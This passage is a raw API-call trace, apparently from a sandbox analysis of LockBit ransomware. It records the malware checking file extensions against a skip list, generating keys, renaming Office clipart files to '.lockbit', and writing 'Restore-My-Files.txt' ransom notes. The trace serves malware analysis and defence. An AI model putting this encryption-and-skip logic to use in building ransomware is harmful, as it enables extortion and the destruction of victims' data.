BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.990] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.990] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.997] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.998] malloc (_Size=0x9c) returned 0x2073f40 [0109.998] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0x9c, FileInformationClass=0xa) returned 0xc0000008 [0109.998] free (_Block=0x2073f40) [0109.998] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.998] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.998] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.998] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce30000, ftCreationTime.dwHighDateTime=0x1bd78be, ftLastAccessTime.dwLowDateTime=0x606ee510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce30000, ftLastWriteTime.dwHighDateTime=0x1bd78be, nFileSizeHigh=0x0, nFileSizeLow=0x2856, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUPINST.WMF", cAlternateFileName="")) returned 1 [0109.998] lstrcmpiW (lpString1=".", lpString2="CUPINST.WMF") returned -1 [0109.998] lstrcmpiW (lpString1="..", lpString2="CUPINST.WMF") returned -1 [0109.998] PathFindExtensionW (pszPath="CUPINST.WMF") returned=".WMF" [0109.998] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.998] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.998] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.998] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.998] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.998] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.998] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.998] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.998] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.999] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.999] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.000] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CUPINST.WMF") returned 1 [0110.000] lstrcmpiW (lpString1="ntldr", lpString2="CUPINST.WMF") returned 1 [0110.000] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CUPINST.WMF") returned 1 [0110.000] lstrcmpiW (lpString1="bootsect.bak", lpString2="CUPINST.WMF") returned -1 [0110.000] lstrcmpiW (lpString1="autorun.inf", lpString2="CUPINST.WMF") returned -1 [0110.000] lstrcmpiW (lpString1="thumbs.db", lpString2="CUPINST.WMF") returned 1 [0110.000] lstrcmpiW (lpString1="iconcache.db", lpString2="CUPINST.WMF") returned 1 [0110.000] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.000] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned=".WMF" [0110.000] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.001] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.001] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.002] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.lockbit") returned 71 [0110.002] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.003] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.003] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.003] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10326) returned 1 [0110.004] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.004] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.004] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.005] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.012] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.012] malloc (_Size=0xa4) returned 0x77d800 [0110.012] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa4, FileInformationClass=0xa) returned 0xc0000008 [0110.021] free (_Block=0x77d800) [0110.021] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.021] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.021] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.021] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x606ee510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7992, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00117_.WMF", cAlternateFileName="")) returned 1 [0110.021] lstrcmpiW (lpString1=".", lpString2="DD00117_.WMF") returned -1 [0110.021] lstrcmpiW (lpString1="..", lpString2="DD00117_.WMF") returned -1 [0110.021] PathFindExtensionW (pszPath="DD00117_.WMF") returned=".WMF" [0110.021] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.021] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.021] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.021] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.021] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.021] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.021] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.021] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.021] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.022] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.022] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00117_.WMF") returned 1 [0110.023] lstrcmpiW (lpString1="ntldr", lpString2="DD00117_.WMF") returned 1 [0110.023] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00117_.WMF") returned 1 [0110.023] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00117_.WMF") returned -1 [0110.023] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00117_.WMF") returned -1 [0110.023] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00117_.WMF") returned 1 [0110.023] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00117_.WMF") returned 1 [0110.023] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.023] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned=".WMF" [0110.023] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.023] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.023] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.024] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.024] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.lockbit") returned 72 [0110.025] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.026] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.026] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.026] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31122) returned 1 [0110.026] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.028] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.028] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.033] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.033] malloc (_Size=0xa6) returned 0x77d800 [0110.033] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0110.036] free (_Block=0x77d800) [0110.036] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.037] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.037] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.037] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6a43700, ftCreationTime.dwHighDateTime=0x1bd4aee, ftLastAccessTime.dwLowDateTime=0x606ee510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd6a43700, ftLastWriteTime.dwHighDateTime=0x1bd4aee, nFileSizeHigh=0x0, nFileSizeLow=0x2040, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00121_.WMF", cAlternateFileName="")) returned 1 [0110.037] lstrcmpiW (lpString1=".", lpString2="DD00121_.WMF") returned -1 [0110.037] lstrcmpiW (lpString1="..", lpString2="DD00121_.WMF") returned -1 [0110.037] PathFindExtensionW (pszPath="DD00121_.WMF") returned=".WMF" [0110.037] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.037] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.038] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.038] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1="Restore-My-Files.txt", 